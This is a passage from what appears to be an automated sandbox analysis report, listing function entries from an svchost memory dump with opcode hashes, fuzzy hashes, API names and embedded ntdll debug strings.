                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e2fdf910f27150313d4b6193300780ff7abc3f517efd0a449ba53f1ba5ced015
                                                                                                              • Instruction ID: 6576dd90b0bed58c9f0b55aa825fbb7f305554df6125234ae0d6eae5c1f08767
                                                                                                              • Opcode Fuzzy Hash: e2fdf910f27150313d4b6193300780ff7abc3f517efd0a449ba53f1ba5ced015
                                                                                                              • Instruction Fuzzy Hash: 4190023220180803D100B2584848787000687D0306F95C061A516855AE8775C991A531
                                                                                                              Function 03B72F90 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 998c5a89550df1248490d796c9ab5eb1117d48eb074d8ad6e2602a8bb6457782
                                                                                                              • Instruction ID: c184b5e40f22b6d028b6ac4d283d5d462cbe42cc3ccc1adb89012ad3509cf16a
                                                                                                              • Opcode Fuzzy Hash: 998c5a89550df1248490d796c9ab5eb1117d48eb074d8ad6e2602a8bb6457782
                                                                                                              • Instruction Fuzzy Hash: 9E90023220180803D100B258485474B000687D0306F95C061A116855AD87358951A571
                                                                                                              Function 03B72FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ceda480bcdaba3f9e63c1e01ec8751860344e9da6a9078200cb21b9546b646c
                                                                                                              • Instruction ID: 825b9771dab514d99775849990276a2d85d5e19300e96f1d06e84f143fdda1dc
                                                                                                              • Opcode Fuzzy Hash: 8ceda480bcdaba3f9e63c1e01ec8751860344e9da6a9078200cb21b9546b646c
                                                                                                              • Instruction Fuzzy Hash: 4D900222211C0443D200B6684C54B47000687D0307F95C165A0158559CCA2589619521
                                                                                                              Function 03B72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7d24c9674cd5903e0f476048c8ec2c5cdd71f64cf03f597e0ab23bec3b92bb4
                                                                                                              • Instruction ID: c3f17c4ac4c1d22316da7396fec091ea6027f69bf21693de135c1cc9439d322b
                                                                                                              • Opcode Fuzzy Hash: e7d24c9674cd5903e0f476048c8ec2c5cdd71f64cf03f597e0ab23bec3b92bb4
                                                                                                              • Instruction Fuzzy Hash: AA90026234140843D100B2584454B460006C7E1305F95C065E1068559D8729CD52A126
                                                                                                              Function 03B72F60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 351c391620fea01c38dff108d1cd28980579a409bc471934e2e7a186344ecb64
                                                                                                              • Instruction ID: d9fda95fd42a1b5e1b01f680cfff01050327fb51f7f0ece9b285d8e12278d93e
                                                                                                              • Opcode Fuzzy Hash: 351c391620fea01c38dff108d1cd28980579a409bc471934e2e7a186344ecb64
                                                                                                              • Instruction Fuzzy Hash: DC90026221140443D104B2584444746004687E1305F95C062A2158559CC6398D619125
                                                                                                              Function 03B72EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0f93ee0c56157074a47705bff1cdd60e9b6823c553b105bc40c48e8c99ce2ed8
                                                                                                              • Instruction ID: 01d2caf658c794e214dc3f1e4e80c8e74329b08cf77db167abbfb0b991de54f6
                                                                                                              • Opcode Fuzzy Hash: 0f93ee0c56157074a47705bff1cdd60e9b6823c553b105bc40c48e8c99ce2ed8
                                                                                                              • Instruction Fuzzy Hash: 2690027220140803D140B2584444786000687D0305F95C061A5068559E87698ED5A665
                                                                                                              Function 03B72E80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e7a175350b943e8768812a3750e648f4aa8b6fbedd46b63dae9ca8802f8ce8f
                                                                                                              • Instruction ID: e65c0becdccbe14088bbe9223c7b1ce9ef7823d1be2883e420802027b199bed7
                                                                                                              • Opcode Fuzzy Hash: 6e7a175350b943e8768812a3750e648f4aa8b6fbedd46b63dae9ca8802f8ce8f
                                                                                                              • Instruction Fuzzy Hash: C690022260140903D101B2584444656000B87D0345FD5C072A102855AECB358A92E131
                                                                                                              Function 03B72EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e29350c6a31ecd2ec2735014090ecf15276c477a647522c7bc93c701ee7cae4
                                                                                                              • Instruction ID: 198b08bf808e0b77bbe8559955f15e7da807bc6cec1139492ed32db0f835c7d9
                                                                                                              • Opcode Fuzzy Hash: 2e29350c6a31ecd2ec2735014090ecf15276c477a647522c7bc93c701ee7cae4
                                                                                                              • Instruction Fuzzy Hash: C490026220180803D140B6584844647000687D0306F95C061A206855AE8B398D51A135
                                                                                                              Function 03B72E30 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae53ef9cc912038a5b237e39df16c5aedcaccfdd1903c1fcccc089f417feb1cd
                                                                                                              • Instruction ID: 36484d7eb8ebaee0688e66b67b53b2d8ae8da1f86db64d2262ebf08df3c239d4
                                                                                                              • Opcode Fuzzy Hash: ae53ef9cc912038a5b237e39df16c5aedcaccfdd1903c1fcccc089f417feb1cd
                                                                                                              • Instruction Fuzzy Hash: 7A90022230140803D102B2584454646000AC7D1349FD5C062E142855AD87358A53E132
                                                                                                              Function 03B72DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ff34c6c7fc9c62c7b74367096bc6594bb96ef10c3755786ec94a98a81958d13b
                                                                                                              • Instruction ID: 42b886f08f88d403a2010f0a4e8edb503d1498cc689daf32e84d5de261fa503d
                                                                                                              • Opcode Fuzzy Hash: ff34c6c7fc9c62c7b74367096bc6594bb96ef10c3755786ec94a98a81958d13b
                                                                                                              • Instruction Fuzzy Hash: A390023224140803D141B2584444646000A97D0345FD5C062A0428559E87658B56EA61
                                                                                                              Function 03B72DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7f9e40e446abc5808d2d2aa9d0a04ddf2b0d09a99d259a5366d588dc1da4461
                                                                                                              • Instruction ID: 9fb2c2f9acbd5040fd89e985db5b48c6b962049076afffaca145708a576b239d
                                                                                                              • Opcode Fuzzy Hash: e7f9e40e446abc5808d2d2aa9d0a04ddf2b0d09a99d259a5366d588dc1da4461
                                                                                                              • Instruction Fuzzy Hash: 0A900222242445535545F2584444547400797E03457D5C062A1418955C86369956D621
                                                                                                              Function 03B72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87fb3161d1265d0693639d2d644414ce13b54e115e1b81b26222ca907460b9d0
                                                                                                              • Instruction ID: 35301a685225214eed16baee6f5f3945a8b35a0b19d4290764abf5bc2409a119
                                                                                                              • Opcode Fuzzy Hash: 87fb3161d1265d0693639d2d644414ce13b54e115e1b81b26222ca907460b9d0
                                                                                                              • Instruction Fuzzy Hash: FD90022230140403D140B25854586464006D7E1305F95D061E0418559CDA2589569222
                                                                                                              Function 03B72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2126c3395befe59c0d4d206e1a3a5e794ccc9cec0105e06f9aa778df06988fa2
                                                                                                              • Instruction ID: 0164b00fdb9fb81ef51e3b9e717393c5b91312bb66d9c19cd421e665cc2d0048
                                                                                                              • Opcode Fuzzy Hash: 2126c3395befe59c0d4d206e1a3a5e794ccc9cec0105e06f9aa778df06988fa2
                                                                                                              • Instruction Fuzzy Hash: D490022A21340403D180B258544864A000687D1306FD5D465A001955DCCA2589699321
                                                                                                              Function 03B73D10 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0568e034a5b9cbd1e290cb8453d1d78194b5ce07ad3b8f733cbd3a7a742ed8f3
                                                                                                              • Instruction ID: 8fb32997389423909da968daa0dee92b8779095e94065eaeddd2adf8a0ebf889
                                                                                                              • Opcode Fuzzy Hash: 0568e034a5b9cbd1e290cb8453d1d78194b5ce07ad3b8f733cbd3a7a742ed8f3
                                                                                                              • Instruction Fuzzy Hash: 0B900232202405439540B3585844A8E410687E1306BD5D465A0019559CCA2489619221
                                                                                                              Function 03B72D00 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86da4803ebe63b4e52f44602b24f2ccc818cfe29804c2b8d03662aeb49ad0010
                                                                                                              • Instruction ID: 371a84279ff51116a34a11b2f35c6f87c50140a3b6121fed98dfc2a49790e87a
                                                                                                              • Opcode Fuzzy Hash: 86da4803ebe63b4e52f44602b24f2ccc818cfe29804c2b8d03662aeb49ad0010
                                                                                                              • Instruction Fuzzy Hash: 5C90022220544843D100B6585448A46000687D0309F95D061A106859ADC7358951E131
                                                                                                              Function 03B73D70 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c4c85c094d9e24198479a5a4ecb7bf822820347a7a1e29172d0d11c00643cbf
                                                                                                              • Instruction ID: e26ba4ea7e22664486c025fb0f00e77351f3495701d8ad16081b29aba9771a6e
                                                                                                              • Opcode Fuzzy Hash: 1c4c85c094d9e24198479a5a4ecb7bf822820347a7a1e29172d0d11c00643cbf
                                                                                                              • Instruction Fuzzy Hash: 5C90023620140803D510B2585844686004787D0305F95D461A042855DD876489A1E121
                                                                                                              Function 03B72CA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a81772f440c51019b86228001639c2d849d8467fd4ecefa1308dd0617618d48
                                                                                                              • Instruction ID: d77ef9f95a7e436ce4d6bae011aac185d10b5b716cec6cde6bb1add05b096567
                                                                                                              • Opcode Fuzzy Hash: 1a81772f440c51019b86228001639c2d849d8467fd4ecefa1308dd0617618d48
                                                                                                              • Instruction Fuzzy Hash: 4C90023220140803D100B6985448686000687E0305F95D061A502855AEC7758991A131
                                                                                                              Function 03B72CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4325be83b5cddeb5f144a2a498c3cb2406ee6783551250f4cfc2ed51b1e529b
                                                                                                              • Instruction ID: 637af7d8a0b7c1b1ffe72163703b070e43e872e40d90049079bb4fbf5ea80a78
                                                                                                              • Opcode Fuzzy Hash: b4325be83b5cddeb5f144a2a498c3cb2406ee6783551250f4cfc2ed51b1e529b
                                                                                                              • Instruction Fuzzy Hash: 9D90023220140803D100B2585548747000687D0305F95D461A042855DDD7668951A121
                                                                                                              Function 03B72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d6c84d03f7c16c68be727eecf32e3dfd265e17d0d937c5e47852d97efc3dd28
                                                                                                              • Instruction ID: e6f2d5aa0042443b425f96beeb880aa97bc68b5dd8f4ec4200ee233a0640d725
                                                                                                              • Opcode Fuzzy Hash: 0d6c84d03f7c16c68be727eecf32e3dfd265e17d0d937c5e47852d97efc3dd28
                                                                                                              • Instruction Fuzzy Hash: 7990022260540803D140B2585458746001687D0305F95D061A0028559DC7698B55A6A1
                                                                                                              Function 03B72C60 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9254fea5c788b415d804790b06eb15edcba0d20ca4d155644ed121425bcc3302
                                                                                                              • Instruction ID: cc9629ca1eee8af38c4de0344c4358dcc29b09ef635bf1e26d4cfbdd4a9ecb92
                                                                                                              • Opcode Fuzzy Hash: 9254fea5c788b415d804790b06eb15edcba0d20ca4d155644ed121425bcc3302
                                                                                                              • Instruction Fuzzy Hash: 1690023220140C43D100B2584444B86000687E0305F95C066A0128659D8725C951B521
                                                                                                              Function 03B72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: 2dd79678d772cc262ae864bc82046cc7324b3643f083d73dfe72a31cdf509098
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Function 03B72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
                                                                                                              • Instruction ID: 5c8af0b260fa8f49e82fee6a2bec37b672049d5b7af52ce6f4bafd1734a4b12b
                                                                                                              • Opcode Fuzzy Hash: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
                                                                                                              • Instruction Fuzzy Hash: 2951BAB5A04516BFCB10DB5C889097EFBB8FF48248B5885F9E475DB641D234DE44CBA0
                                                                                                              Function 03B67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BA4725
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BA4655
                                                                                                              • ExecuteOptions, xrefs: 03BA46A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 03BA4787
                                                                                                              • Execute=1, xrefs: 03BA4713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BA4742
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BA46FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
                                                                                                              • Instruction ID: 1aabcf3da9a3235e24e763a942f275d0993f24d19d57f1bfdf56f9e082e25d5a
                                                                                                              • Opcode Fuzzy Hash: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
                                                                                                              • Instruction Fuzzy Hash: 1C51E935A007196ADF20EAA9DC86FBE77B8EF0430CF1400F9E515AB192DFB59E458B50
                                                                                                              Function 03B7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction ID: c98adefd2fe21eb7a86325b7c6ea356b3f706f4d12cdedb210bce4eace38ae73
                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                              • Instruction Fuzzy Hash: D1818D74E052499EDF28CE68C8917FEFBA5EF45358F1C42EAD871AB390C63499408F50
                                                                                                              Function 03B5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03BA02E7
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03BA02BD
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA031E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
                                                                                                              • Instruction ID: 510e3df8f61d4da77e553b79e594c9d7072bdefd73ebe65b350634b140656ef6
                                                                                                              • Opcode Fuzzy Hash: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
                                                                                                              • Instruction Fuzzy Hash: 7EE18B30608B41DFD725DF28C884B2AF7E4FB88318F184AB9F9A58B291D774D945CB42
                                                                                                              Function 03B6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 03BA7B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03BA7B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA7BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
                                                                                                              • Instruction ID: be1c3da9c046d706e21d55d1abf6427ce4344e5dc764548732c983d4fc19e5fa
                                                                                                              • Opcode Fuzzy Hash: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
                                                                                                              • Instruction Fuzzy Hash: D341F235704B028FC724DE29CC51B6AB7E9EB88718F040ABDE95ADB291DB70E4058B91
                                                                                                              Function 03B6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BA728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 03BA72A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03BA7294
                                                                                                              • RTL: Re-Waiting, xrefs: 03BA72C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
                                                                                                              • Instruction ID: d59ce6bb61568b8cc3336843d55ab8582c602670d6e548c617b9d9ab44cd8cee
                                                                                                              • Opcode Fuzzy Hash: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
                                                                                                              • Instruction Fuzzy Hash: 4C410135B08B06ABCB20CE69CC42B6AB7B5FB85718F1406B9F855DB241DB24E81287D0
                                                                                                              Function 03B77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
